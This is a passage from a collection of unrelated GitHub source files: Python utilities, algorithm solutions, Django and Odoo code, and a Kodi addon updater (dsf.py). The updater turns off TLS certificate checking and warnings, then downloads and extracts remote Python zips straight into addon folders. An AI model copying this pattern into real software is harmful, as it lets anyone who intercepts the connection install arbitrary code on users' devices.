member_name.startswith('_')):\n value = getattr(run.font, member_name)\n try:\n setattr(new_run.font, member_name, value)\n except Exception:\n pass\n if (item[0] == '-'):\n new_run.font.color.rgb = RGBColor(255, 0, 0)\n elif (item[0] == '+'):\n new_run.font.color.rgb = RGBColor(0, 255, 0)\n elif (item[0] == '?'):\n new_run.font.color.rgb = RGBColor(0, 0, 255)\n\n\ndef iter_block_items(parent):\n if isinstance(parent, _Document):\n parent_elm = parent.element.body\n elif isinstance(parent, _Cell):\n parent_elm = parent._tc\n else:\n raise ValueError(\"something's not right\")\n\n for child in parent_elm.iterchildren():\n if isinstance(child, CT_P):\n yield Paragraph(child, parent)\n elif isinstance(child, CT_Tbl):\n yield Table(child, parent)\n\n\ndocument = Document(docx_path)\ndocument.save(result_path)\ndocument = Document(docx_path)\n\nindex = 0\nfor block in iter_block_items(document):\n is_paragraph = isinstance(block, Paragraph)\n if is_paragraph:\n paragraph = block\n old_runs = paragraph.runs\n if (len(old_runs) == 0):\n continue\n paragraph._p.clear()\n\n for run in old_runs:\n for char in run.text:\n if index >= len(diff):\n raise Exception('Out Of Index')\n visited = char == diff[index][-1] and '+' != diff[index][0]\n while not visited and index < len(diff) - 1:\n add_run(paragraph, run, diff[index])\n index += 1\n visited = (char == diff[index][-1]\n and diff[index][0] != '+')\n add_run(paragraph, run, diff[index])\n index += 1\n else:\n table = block\n for row in table.rows:\n for cell in row.cells:\n for paragraph in cell.paragraphs:\n old_runs = paragraph.runs\n if (len(old_runs) == 0):\n continue\n paragraph._p.clear()\n\n for run in old_runs:\n for char in 
run.text:\n if index >= len(diff):\n raise Exception('Out Of Index')\n visited = (char == diff[index][-1]\n and diff[index][0] != '+')\n while not visited and index < len(diff) - 1:\n add_run(paragraph, run, diff[index])\n index += 1\n visited = (char == diff[index][-1]\n and diff[index][0] != '+')\n add_run(paragraph, run, diff[index])\n index += 1\n\ndocument.save(result_path)\nprint('OK')","repo_name":"run-dream/ContractDiff","sub_path":"code/contract_diff.py","file_name":"contract_diff.py","file_ext":"py","file_size_in_byte":4089,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"4210353797","text":"#! /usr/bin/env python\n\nimport sys\nfrom sha256 import sha256\n\nif len(sys.argv) < 2:\n print(f\"Usage: {sys.argv[0]} [hex]\", file=sys.stderr)\n sys.exit(1)\n \ninput = sys.argv[1]\n\nis_hex = False\nif len(sys.argv) >= 3:\n\tis_hex = sys.argv[2].lower() == \"hex\"\n \nresult = sha256(input, is_hex)\nprint(result)","repo_name":"ottosch/simple-sha256","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"3989536996","text":"import numpy as np\n\nsorted_list = [1, 2, 3, 4, 5, 6, 7, 8, 9]\nprev_img_time = 2.5\nimg_time = 5.5\nstart_index = next((i for i, v in enumerate(sorted_list) if v >= prev_img_time), 0)\nend_index = next((i for i, v in enumerate(sorted_list) if v >= img_time), len(sorted_list))\nodom_msgs_cur = sorted_list[start_index:end_index]\n\nprint(odom_msgs_cur)\n\n# # Find the index for the start value\n# start_index = next((i for i, v in enumerate(sorted_list) if v >= 4), None)\n#\n# # Find the index for the end value\n# end_index = next((i for i, v in enumerate(sorted_list) if v > 10), len)\n#\n# print(start_index) # This will output: 3\n# print(end_index) # This will output: 10\n#\n# # Slice the list between start and end indices\n# filtered_list = sorted_list[start_index:end_index]\n#\n# print(filtered_list) # This will output: [4, 5, 6, 7, 8, 9, 10]\n\n\nx = [1]\nprint(x[:-1])\n","repo_name":"Jostan86/pf_trunk_width","sub_path":"scripts/trials/odom_indexing.py","file_name":"odom_indexing.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74478809700","text":"# -*- coding: utf-8 -*-\r\n#\r\n# Copyright (C) 2015 Richard Dean\r\n#\r\n\r\nimport xbmcaddon\r\nimport xbmc\r\nimport requests\r\nimport requests.packages.urllib3\r\nrequests.packages.urllib3.disable_warnings()\r\n\r\nimport json\r\nimport os\r\n\r\nimport sfile\r\nimport utilsOTT as utils\r\n\r\n\r\nADDON = utils.ADDON\r\nHOME = utils.HOME\r\nPROFILE = utils.PROFILE\r\n\r\nAddonID = utils.AddonID\r\nAddon = utils.Addon \r\nepghome = utils.epghome\r\nepgpath = utils.epgpath\r\nextras = utils.extras \r\nlogos = utils.logos \r\n\r\nDSFID = utils.DSFID\r\nDSF = utils.DSF\r\nDSFVER = utils.DSFVER\r\nhome = utils.home\r\nprofile = utils.profile\r\n\r\nURL = utils.getBaseURL() + 'dsf-update.txt'\r\nFIRSTRUN = utils.getSetting('FIRSTRUN') == 'true'\r\n\r\nSkinID = 'skin.bello-dsf'\r\nSkin = xbmcaddon.Addon(SkinID) # forked bello version: 3.0.8\r\nskinhome = Skin.getAddonInfo('path')\r\n\r\n\r\ndef checkUpdate():\r\n if not FIRSTRUN:\r\n BASEURL = utils.getBaseURL()\r\n utils.DialogOK('Bienvenido a GVAX', 'Ahora vamos a hacer una copia de seguridad de alguno de', 'los archivos existentes antes de la instalación.') \r\n 
doBackup()\r\n \r\n Addon.setSetting('dixie.skin', 'EPG-Skin')\r\n utils.setSetting('SKIN', 'OTT-Skin')\r\n\r\n downloadDefaults(BASEURL)\r\n return\r\n\r\n response = getResponse()\r\n ottskin = response['DSFOTTSkin']\r\n epgskin = response['DSFEPGSkin']\r\n logocolour = response['DSFLogos']\r\n ottupdate = response['DSFOTTUpdate']\r\n epgupdate = response['DSFEPGUpdate']\r\n dsfupdate = response['DSFUpdate']\r\n kodiskin = response['DSFKodiSkin']\r\n\r\n\r\n curr = ottskin\r\n prev = utils.getSetting('DSFOTTSKIN')\r\n\r\n if not prev == curr:\r\n url = BASEURL + response['DSF OTT Skin']\r\n path = xbmc.translatePath(PROFILE) \r\n path = os.path.join(path, 'skins')\r\n zipfile = os.path.join(path, 'dsf-skin-update.zip')\r\n \r\n if not sfile.exists(path):\r\n sfile.makedirs(path)\r\n \r\n downloadSkins(url, path, zipfile)\r\n utils.setSetting('DSFOTTSKIN', curr)\r\n\r\n\r\n curr = epgskin\r\n prev = utils.getSetting('DSFEPGSKIN')\r\n\r\n if not prev == curr:\r\n url = BASEURL + response['DSF EPG Skin']\r\n path = os.path.join(extras, 'skins')\r\n zipfile = os.path.join(path, 'dsf-skin-update.zip')\r\n \r\n if not sfile.exists(path):\r\n sfile.makedirs(path)\r\n \r\n downloadSkins(url, path, zipfile)\r\n utils.setSetting('DSFEPGSKIN', curr)\r\n\r\n\r\n curr = logocolour\r\n prev = utils.getSetting('DSFLOGOS')\r\n\r\n if not prev == curr:\r\n url = BASEURL + response['DSF Logos']\r\n path = os.path.join(logos, 'Colour Logo Pack')\r\n zipfile = os.path.join(path, 'dsf-logos-update.zip')\r\n \r\n if not sfile.exists(path):\r\n sfile.makedirs(path)\r\n \r\n downloadLogos(url, path, zipfile)\r\n utils.setSetting('DSFLOGOS', curr)\r\n\r\n\r\n curr = ottupdate\r\n prev = utils.getSetting('DSFOTTUPDATE')\r\n\r\n if not prev == curr:\r\n url = BASEURL + response['DSF OTT Update']\r\n path = xbmc.translatePath(HOME)\r\n zipfile = os.path.join(path, 'dsf-ott-python.zip')\r\n \r\n doOTTUpdate(url, path, zipfile, ottupdate)\r\n utils.setSetting('DSFOTTUPDATE', curr)\r\n\r\n\r\n curr = epgupdate\r\n prev = utils.getSetting('DSFEPGUPDATE')\r\n\r\n if not prev == curr:\r\n url = BASEURL + response['DSF EPG Update']\r\n path = xbmc.translatePath(epghome)\r\n zipfile = os.path.join(path, 'dsf-epg-python.zip')\r\n \r\n if not sfile.exists(path):\r\n sfile.makedirs(path)\r\n \r\n doEPGUpdate(url, path, zipfile, epgupdate)\r\n utils.setSetting('DSFEPGUPDATE', curr)\r\n \r\n \r\n curr = dsfupdate\r\n prev = utils.getSetting('DSFUPDATE')\r\n\r\n if not prev == curr:\r\n url = BASEURL + response['DSF Update']\r\n path = xbmc.translatePath(home)\r\n zipfile = os.path.join(path, 'dsf-update.zip')\r\n \r\n if not sfile.exists(path):\r\n sfile.makedirs(path)\r\n \r\n doDSFUpdate(url, path, zipfile, dsfupdate)\r\n utils.setSetting('DSFUPDATE', curr)\r\n \r\n\r\n curr = kodiskin\r\n prev = utils.getSetting('DSFKODISKIN')\r\n\r\n if not prev == curr:\r\n url = BASEURL + response['DSF Kodi Skin']\r\n path = xbmc.translatePath(skinhome)\r\n zipfile = os.path.join(path, 'dsf-kodi-skin.zip')\r\n \r\n if not sfile.exists(path):\r\n sfile.makedirs(path)\r\n \r\n doDSFUpdate(url, path, zipfile, kodiskin)\r\n utils.setSetting('DSFKODISKIN', curr)\r\n\r\n return\r\n\r\n\r\ndef getResponse():\r\n request = requests.get(URL, verify=False)\r\n response = request.content\r\n\r\n utils.Log('Response in checkUpdate %s' % str(response))\r\n\r\n return json.loads(u\"\" + (response))\r\n\r\n\r\ndef doBackup():\r\n import datetime\r\n \r\n src = os.path.join(epgpath, 'channels')\r\n dst = os.path.join(epgpath, 'channels-backup')\r\n \r\n 
try:\r\n sfile.remove(dst)\r\n sfile.copy(src, dst)\r\n except:\r\n pass\r\n \r\n if os.path.exists(logos):\r\n now = datetime.datetime.now()\r\n date = now.strftime('%B-%d-%Y %H-%M')\r\n \r\n cur = Addon.getSetting('dixie.logo.folder')\r\n src = os.path.join(logos, cur)\r\n dst = os.path.join(logos, cur+'-%s' % date)\r\n \r\n try:\r\n sfile.rename(src, dst)\r\n except:\r\n pass\r\n\r\n\r\ndef downloadDefaults(url):\r\n import download\r\n import extract\r\n\r\n url1 = url + 'ott/skins.zip'\r\n url2 = url + 'ottepg/skins.zip'\r\n url3 = url + 'ottepg/logos.zip'\r\n # url4 = url + 'ottepg/channels.zip'\r\n \r\n path1 = xbmc.translatePath(PROFILE) # /addon_data/script.on-tapp.tv/\r\n path2 = os.path.join(epgpath, 'extras') # /addon_data/script.tvguidedixie/extras/\r\n path3 = os.path.join(path2, 'skins')\r\n path4 = os.path.join(path2, 'logos')\r\n \r\n zip1 = os.path.join(path1, 'skins.zip')\r\n zip2 = os.path.join(path2, 'skins.zip')\r\n zip3 = os.path.join(path2, 'logos.zip')\r\n # zip4 = os.path.join(epgpath, 'channels.zip')\r\n\r\n if not sfile.exists(epgpath):\r\n sfile.makedirs(epgpath)\r\n \r\n if not sfile.exists(path1):\r\n sfile.makedirs(path1)\r\n download.download(url1, zip1)\r\n extract.all(zip1, path1, dp='Installing OTT skins')\r\n sfile.remove(zip1)\r\n \r\n if not sfile.exists(path2):\r\n sfile.makedirs(path2)\r\n download.download(url2, zip2)\r\n extract.all(zip2, path2, dp='Installing EPG skins')\r\n sfile.remove(zip2)\r\n \r\n if not sfile.exists(path4):\r\n sfile.makedirs(path2)\r\n download.download(url3, zip3)\r\n extract.all(zip3, path2)\r\n sfile.remove(zip3)\r\n \r\n # if not sfile.exists(epgpath):\r\n # sfile.makedirs(epgpath)\r\n # download.download(url4, zip4)\r\n # extract.all(zip4, epgpath)\r\n # sfile.remove(zip4)\r\n\r\n Addon.setSetting('dixie.skin', 'EPG-Skin')\r\n Addon.setSetting('playlist.url', '')\r\n utils.setSetting('SKIN', 'OTT-Skin')\r\n \r\n if utils.DialogYesNo('Would you like to assign a button ', 'on your remote control or keybord', 'to activate the On-Tapp.TV Mini-Guide?'):\r\n xbmc.executebuiltin('RunScript(special://home/addons/script.tvguidedixie/keyProgrammer.py)')\r\n \r\n utils.setSetting('FIRSTRUN', 'true')\r\n\r\n\r\ndef downloadSkins(url, path, zipfile):\r\n import download\r\n import extract\r\n \r\n utils.DialogOK('Una nueva version actualizada está disponible.', 'Se puede descargar e instalar \",\" en su sistema GVAX.')\r\n \r\n download.download(url, zipfile)\r\n extract.all(zipfile, path, dp='Installing skin update')\r\n sfile.remove(zipfile)\r\n \r\n \r\ndef downloadLogos(url, path, zipfile):\r\n import download\r\n import extract\r\n \r\n utils.DialogOK('Algunos de los nuevos logotipos están disponibles.', 'Pueden ser descargados y añadidos a su logopack.')\r\n \r\n download.download(url, zipfile)\r\n extract.all(zipfile, path, dp='Installing logo update')\r\n sfile.remove(zipfile)\r\n \r\n\r\ndef doOTTUpdate(url, path, zipfile, ottupdate):\r\n import download\r\n import extract\r\n \r\n utils.DialogOK('A GVAX \"Live Update\" está disponible.', 'Actualización %s será descargado e instalado en su sistema.'% (ottupdate), 'Gracias.')\r\n download.download(url, zipfile)\r\n extract.all(zipfile, path, dp='Installing python update')\r\n sfile.remove(zipfile)\r\n utils.Log('OTT Update %s installed' % str(ottupdate))\r\n xbmc.executebuiltin('UpdateLocalAddons')\r\n\r\n\r\ndef doEPGUpdate(url, path, zipfile, epgupdate):\r\n import download\r\n import extract\r\n\r\n utils.DialogOK('Un GVAX EPG es \"Live Update\" disponible.', 
'Actualización EPG %s será descargado e instalado en su sistema.' % (epgupdate), 'Gracias.')\r\n \r\n download.download(url, zipfile)\r\n extract.all(zipfile, path, dp='Installing python update')\r\n sfile.remove(zipfile)\r\n utils.Log('EPG Update %s installed' % str(epgupdate))\r\n xbmc.executebuiltin('UpdateLocalAddons')\r\n\r\n\r\ndef doDSFUpdate(url, path, zipfile, dsfupdate):\r\n import download\r\n import extract\r\n\r\n utils.DialogOK('Un GVAX es \"Live Update\" disponible.', 'Actualización %s será descargado e instalado en su sistema.' % (dsfupdate), 'Gracias.')\r\n \r\n download.download(url, zipfile)\r\n extract.all(zipfile, path, dp='Installing python update')\r\n sfile.remove(zipfile)\r\n utils.Log('EPG Update %s installed' % str(dsfupdate))\r\n xbmc.executebuiltin('UpdateLocalAddons')\r\n\r\n\r\ndef doDSFSkinUpdate(url, path, zipfile, kodiskin):\r\n import download\r\n import extract\r\n\r\n utils.DialogOK('Un GVAX es \"Live Update\" disponible.', 'Actualización %s será descargado e instalado en su sistema.' % (kodiskin), 'Gracias.')\r\n \r\n download.download(url, zipfile)\r\n extract.all(zipfile, path, dp='Installing skin update')\r\n sfile.remove(zipfile)\r\n utils.Log('Skin Update %s installed' % str(kodiskin))\r\n xbmc.executebuiltin('UpdateLocalAddons')\r\n","repo_name":"billymcintosh/script.ontappgpl","sub_path":"dsf.py","file_name":"dsf.py","file_ext":"py","file_size_in_byte":10078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"35930726199","text":"import heapq\n\nH, W = map(int, input().split())\nA = [list(map(int, input().split())) for _ in range(H)]\n\ndef grid_dijkstra(sy, sx):\n dist = [[10**100]*W for _ in range(H)]\n que = [(0, sy, sx)]\n heapq.heapify(que)\n dist[sy][sx] = 0\n\n while que:\n d, y, x = heapq.heappop(que)\n if d > dist[y][x]: continue\n for ny, nx in [(y-1, x), (y+1, x), (y, x-1), (y, x+1)]:\n if 0 <= ny < H and 0 <= nx < W and d + A[ny][nx] < dist[ny][nx]:\n dist[ny][nx] = d + A[ny][nx]\n heapq.heappush(que, (dist[ny][nx], ny, nx))\n\n return dist\n\ndist1 = grid_dijkstra(H-1, 0)\ndist2 = grid_dijkstra(H-1, W-1)\ndist3 = grid_dijkstra(0, W-1)\n\nans = 10**100\nfor cy in range(H):\n for cx in range(W):\n ans = min(ans, dist1[cy][cx] + dist2[cy][cx] + dist3[cy][cx] - 2*A[cy][cx])\n\nprint(ans)\n","repo_name":"wonda-tea-coffee/competitive_programming.py","sub_path":"atcoder/past201912_j.py","file_name":"past201912_j.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74655762340","text":"import re\nimport graphviz\n\ndef CreateGraph(dict):\n s = graphviz.Digraph(\"structs\", node_attr={\"shape\": \"record\"})\n field_diagram = \"\"\n function_diagram = \"\"\n main_string = \"\"\n for key, value in dict.items():\n # print(key, value)\n field_diagram = \"\"\n if value[\"fields\"] != []:\n for val in value[\"fields\"]:\n for key1, value1 in val.items():\n if key1 == \"name\": field_diagram += value1 + \" : \"\n elif key1 == \"access\":\n value_joined=\"[]\"\n if len(value1) >= 1: value_joined = ' '.join(str(e) for e in value1)\n field_diagram += value_joined + \" | \"\n \n function_diagram = \"\"\n if value[\"functions\"] != []:\n for fun in value[\"functions\"]:\n for key2, value2 in fun.items():\n if key2 == \"name\":\n if value2 == \"\": function_diagram += \"init\"\n if value2 ==\"\": function_diagram += \"clinit\"\n else: function_diagram += value2\n elif key2 == \"arguments\":\n 
value_joined=\"()\"\n if len(value2) >=1: value_joined = \"(\" + ' '.join(str(e) for e in value2) + \")\"\n function_diagram += value_joined + \": \" \n elif key2 == \"returns\":\n if type(None) == type(value2): function_diagram += \"null\" + \" | \"\n else: function_diagram += value2 + \" | \"\n\n \n if field_diagram: main_string = field_diagram\n if function_diagram: main_string += function_diagram\n # print(main_string[:-2], '\\n')\n\n\n if field_diagram: s.node(key, r\"{ \" + key + \" | \" + main_string[:-2] + \"}\",)\n\n \n for val in value[\"relations\"][\"Composition\"]:\n s.edge(key, val, arrowhead=\"diamond\")\n for val in value[\"relations\"][\"Realization\"]:\n s.edge(key, val, arrowhead=\"normalo\", style=\"dashed\")\n for val in value[\"relations\"][\"Inheritance\"]:\n s.edge(key, val, arrowhead=\"normalo\")\n for val in value[\"relations\"][\"Aggregation\"]:\n s.edge(key, val, arrowhead=\"diamondo\")\n for val in value[\"relations\"][\"Dependency\"]:\n s.edge(key, val, arrowhead=\"vee\", style=\"dashed\")\n\n\n s.node(\"a\", \"\", color=\"white\")\n s.node(\"b\", \"\", color=\"white\")\n s.node(\"c\", \"\", color=\"white\")\n s.node(\"d\", \"\", color=\"white\")\n s.node(\"e\", \"\", color=\"white\")\n s.node(\"f\", \"\", color=\"white\")\n\n s.edge(\"a\", \"b\", arrowhead=\"diamond\", label=\"composition\")\n s.edge(\"b\", \"c\", arrowhead=\"normalo\", style=\"dashed\", label=\"realization\")\n s.edge(\"c\", \"d\", arrowhead=\"normalo\", label=\"inheritance\")\n s.edge(\"d\", \"e\", arrowhead=\"diamondo\", label=\"aggregation\")\n s.edge(\"e\", \"f\", arrowhead=\"vee\", style=\"dashed\", label=\"dependency\")\n\n s.render(\"./class-graph/class-diagram-3.gv\").replace(\"\\\\\", \"/\")\n\n","repo_name":"immarianaas/pa-23","sub_path":"assignment-3/CreateGraph.py","file_name":"CreateGraph.py","file_ext":"py","file_size_in_byte":3020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"7468349984","text":"from ._base import * # noqa\n\n\nACCOUNT_EMAIL_VERIFICATION = 'mandatory'\n\nALLOWED_HOSTS = [\n 'localhost',\n '127.0.0.1',\n '[::1]',\n '.pyslackers.com',\n]\n\nCSRF_COOKIE_SECURE = True\n\nDEBUG = False\n\nLOGGING = {\n 'version': 1,\n 'formatters': {\n 'standard': {\n 'format': \"[PYSLACKERSWEB] [%(asctime)s] %(levelname)s [%(name)s:%(lineno)s] %(message)s\", # noqa\n 'datefmt': \"%d/%b/%Y %H:%M:%S\"\n },\n 'verbose': {\n 'format': '%(process)-5d %(thread)d %(name)-50s %(levelname)-8s %(message)s', # noqa\n },\n 'simple': {\n 'format': '%(levelname)s %(message)s'\n },\n },\n 'handlers': {\n 'console': {\n 'class': 'logging.StreamHandler',\n 'formatter': 'standard',\n },\n 'syslog': {\n 'class': 'logging.handlers.SysLogHandler',\n 'formatter': 'standard',\n 'facility': 'user',\n }\n },\n 'loggers': {\n '': {\n 'handlers': ['console', 'syslog'],\n 'level': 'INFO',\n 'disabled': False,\n 'propagate': True,\n }\n },\n}\n\nSESSION_COOKIE_SECURE = True\n\nX_FRAME_OPTIONS = 'DENY'\n","repo_name":"khdc-me/website","sub_path":"config/settings/production.py","file_name":"production.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"35"} +{"seq_id":"71430014182","text":"# ______Working With Subscribers______\nimport csv\nfrom dataclasses import dataclass\n\n\nclass Subscriber:\n def __init__(self, type_of_accrual, previous_accruals, current_accruals):\n self.type_of_accrual = type_of_accrual\n self.previous_accruals = previous_accruals\n 
self.current_accruals = current_accruals\n\n\n    def get_accruals(self):\n        if self.type_of_accrual == 1:\n            return 301.26\n        else:\n            return (self.current_accruals - self.previous_accruals) * 1.52\n\nwith open(\"абоненты.csv\", encoding='utf-8') as r_file:\n    file_reader = csv.DictReader(r_file, delimiter = \";\")\n    count = 0\n    # Read the data from the CSV file\n    for row in file_reader:\n        if count == 0:\n            f = open('Начисления_абоненты.csv', mode=\"w\", encoding='utf-8')\n            file_writer = csv.writer(f, delimiter=\";\", lineterminator=\"\\r\")\n            file_writer.writerow([\"Индекс\", \"Фамилия\", \"Улица\", \"№ дома\", \"№ Квартиры\",\n                                  \"Тип начисления\", \"Предыдущее\", \"Текущее\", \"Начислено\"])\n        # Write each accrual row to the output file\n        accrual = Subscriber(int(row['Тип начисления']), int(row['Предыдущее']), int(row['Текущее']))\n        file_writer.writerow([row['Индекс'], row['Фамилия'], row['Улица'], row['№ дома'], row['№ Квартиры'], row['Тип начисления'], row['Предыдущее'], row['Текущее'], accrual.get_accruals()])\n        count += 1\n    print(f'Total of {count + 1} rows in the file.')\n\n\n","repo_name":"DXP-Code/STACK_Case_assignment","sub_path":"WWS.py","file_name":"WWS.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"31968587451","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nplt.rc(\"image\", cmap = \"gray\")\n\npath = \"Images/week4/girl.jpg\"\nimg = cv2.imread(path, cv2.IMREAD_COLOR)\nimg = cv2.resize(img, None, fx = 0.7,fy = 0.7, interpolation = cv2.INTER_AREA)\norig = img.copy()\n\n#Pivot points on X coordinates\norig_values = np.array([0,50,100,150,200,255])\n#Changes points on Y-axis for each channel\nrCurve = np.array([0,80,150,190,220,255])\nbCurve = np.array([0,20,40,75,150, 255])\n\n# Create Look Up Tables\nfullRange = np.arange(0,256)\nrLUT = np.interp(fullRange, orig_values, rCurve)\nbLUT = np.interp(fullRange, orig_values, bCurve)\n\n#Apply Lookup table to image channels using LUT\nimg[:,:,0] = cv2.LUT(img[:,:,0], bLUT) # for Blue Channel\nimg[:,:,2] = cv2.LUT(img[:,:,2], rLUT) # for Red Channel\n\n# cool thing to join images into one\ncombined = np.hstack([orig, img])\n\n\nplt.plot(fullRange, rLUT, color = 'r')\nplt.plot(fullRange, fullRange, color = 'black')\nplt.plot(fullRange, bLUT, color = 'b')\nplt.show()\n\ncv2.imshow(\"Warming Filter\", combined)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"KSanjayReddy/OpenCvCourse","sub_path":"51.Color_Adjustment_Using_Curves.py","file_name":"51.Color_Adjustment_Using_Curves.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"42443054830","text":"import pymongo\nimport datetime\nimport pprint\n\nclient = pymongo.MongoClient()\ndb = client.iot_4\n\n\nuser_1 = {\"user_code\": \"noah\", \n         \"card_id\": '123',\n         \"power\": 2.0}\n\nuser_2 = {\"user_code\": \"def\", \n         \"card_id\": '345',\n         \"power\": 1000.0}\n\ndb.users.insert_one(user_1)\ndb.users.insert_one(user_2)\n\n\npoints = db.points\n\npoint_1 = { \"point_code\": \"123\",\n            \"state\": \"ready\",\n            \"user_code\": \"\",\n            \"session\": {\n                'average_points': [0,0,0,0,0],\n                \"start_time\": datetime.datetime.utcnow(),\n                'power_used': 0\n            }\n            
}\n\ndb.points.insert_one(point_1)\n","repo_name":"NoahGallant/CU-IOT-Team-1","sub_path":"smart-outlet/server/setup_db.py","file_name":"setup_db.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"39706057811","text":"import random\nimport sys\nimport os\n\nfor x in range(0,10):\n print(x, ' ', end='')\nprint('\\n')\n\nL = ['Juice', 'Tomatoes', 'Potatoes', 'Bananas']\nfor y in L:\n print(y, ' ', end='')\nprint('\\n')\n\nfor x in [2,4,6,8,10]:\n print(x)\n\nnum_list = [[1,2,3],[10,20,30],[100,200,300]]\nfor x in range(0,3):\n for y in range(0,3):\n print(num_list[x][y])\n","repo_name":"mrthawee/training","sub_path":"python/basic/5_for_loop.py","file_name":"5_for_loop.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"23446280175","text":"import logging\nimport odoo.http\nfrom odooku.request import WebRequestMixin\n\n\n_logger = logging.getLogger(__name__)\n\n\nclass WebSocketRequest(WebRequestMixin, odoo.http.WebRequest):\n\n def __init__(self, httprequest):\n super(WebSocketRequest, self).__init__(httprequest)\n\n def dispatch(self):\n raise NotImplementedError()\n\n\nclass WebSocketRpcRequest(WebSocketRequest):\n\n _request_type = 'json'\n\n def __init__(self, httprequest, data):\n super(WebSocketRpcRequest, self).__init__(httprequest)\n self.params = data.get('params', {})\n self.id = data.get('id')\n self.context = self.params.pop('context', dict(self.session.context))\n\n def dispatch(self):\n try:\n result = self._call_function(**self.params)\n except Exception as exception:\n return self._handle_exception(exception)\n return self._json_response(result)\n\n def _json_response(self, result=None, error=None):\n response = {\n 'jsonrpc': '2.0',\n 'id': self.id\n }\n\n if error is not None:\n response['error'] = error\n if result is not None:\n response['result'] = result\n\n return response\n\n def _handle_exception(self, exception):\n \"\"\"Called within an except block to allow converting exceptions\n to arbitrary responses. 
Anything returned (except None) will\n be used as response.\"\"\"\n try:\n return super(WebSocketRpcRequest, self)._handle_exception(exception)\n except Exception:\n if not isinstance(exception, (odoo.exceptions.Warning, odoo.http.SessionExpiredException, odoo.exceptions.except_orm)):\n _logger.exception(\"Exception during JSON request handling.\")\n error = {\n 'code': 200,\n 'message': \"Odoo Server Error\",\n 'data': odoo.http.serialize_exception(exception)\n }\n if isinstance(exception, odoo.http.AuthenticationError):\n error['code'] = 100\n error['message'] = \"Odoo Session Invalid\"\n if isinstance(exception, odoo.http.SessionExpiredException):\n error['code'] = 100\n error['message'] = \"Odoo Session Expired\"\n return self._json_response(error=error)\n","repo_name":"odooku/odooku","sub_path":"odooku/services/websocket/requests.py","file_name":"requests.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"35"} +{"seq_id":"21132207591","text":"\n# from django.urls import path\n# from .views import ( ContactViewClassBased, FindBlogAPI , \n# DetailViewPost , AddPost,\n# DeleteBlogAPI , AddPostAPI,\n# UpdateBlogAPI , ListViewPostall, \n# searchview , AddPostClassBased, DeleteViewClassBased,\n# ContactViewClassBased , contactview, UpdateViewClassBased\n# )\n\n# urlpatterns = [\n# # path('blog/' , BlogView , name='blogviewname'),\n# path('' , ListViewPostall.as_view() , name=\"ListViewPostallNAME\"),\n# path('ContactClassBased/Contacts/' , contactview.as_view() , name=\"ListViewcontactallNAME\"),\n# path('search/' , searchview , name=\"searchviewname\"),\n# path('Edit/' , UpdateViewClassBased.as_view() , name='EditPostNAME'),\n# path('delete/' , DeleteViewClassBased.as_view() , name='DeletePostNAME'),\n# path('add/' , AddPost , name='AddPostNAME'),\n# path('AddClassBased/' , AddPostClassBased.as_view() , name='AddPostClassBasedNAME'),\n# path('ContactClassBased/' , ContactViewClassBased.as_view() , name='ContactClassBasedNAME'),\n# path('AddPostAPI/' , AddPostAPI , name='AddPostAPIName'),\n# path('FindAPI//' , FindBlogAPI , name='FindBlogAPIName'),\n# path('Find/' , DetailViewPost.as_view() , name=\"DetailViewPostNAME\"), \n# path('DeleteAPI//' , DeleteBlogAPI , name='DeleteBlogAPIName'), \n# path('UpdateAPI//' , UpdateBlogAPI , name='UpdateBlogAPIName'), \n\n# ] \n \n\nfrom django.urls import path\nfrom .views import BlogDetailView, BlogListCreateView, ContactListCreateView\nurlpatterns = [\n path('api/list-create/', BlogListCreateView.as_view(), name='blog-list-create'),\n path('api/detail-update-delete//', BlogDetailView.as_view(), name='blog-detail'),\n path('api/contacts/', ContactListCreateView.as_view(), name='contact-list-create'),\n]\n","repo_name":"hirbodprime/advancedweb","sub_path":"Blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"25034488487","text":"import boto3\n\n\n# Create an S3 client\n# s3 = boto3.client(\"s3\")\ns3 = boto3.client(\"s3\", endpoint_url=\"http://localhost:4566\")\n\n# Call the list_buckets method to get all buckets\nresponse = s3.list_buckets()\n\n# Print each bucket name\nprint(\"All S3 Buckets:\")\nfor bucket in response[\"Buckets\"]:\n 
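The dispatcher above always wraps results and errors in a JSON-RPC 2.0 envelope; a dependency-free sketch of that shape, mirroring _json_response:

def json_response(request_id, result=None, error=None):
    response = {"jsonrpc": "2.0", "id": request_id}
    if error is not None:
        response["error"] = error    # e.g. {"code": 100, "message": "Odoo Session Expired"}
    if result is not None:
        response["result"] = result
    return response

print(json_response(7, result={"ok": True}))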
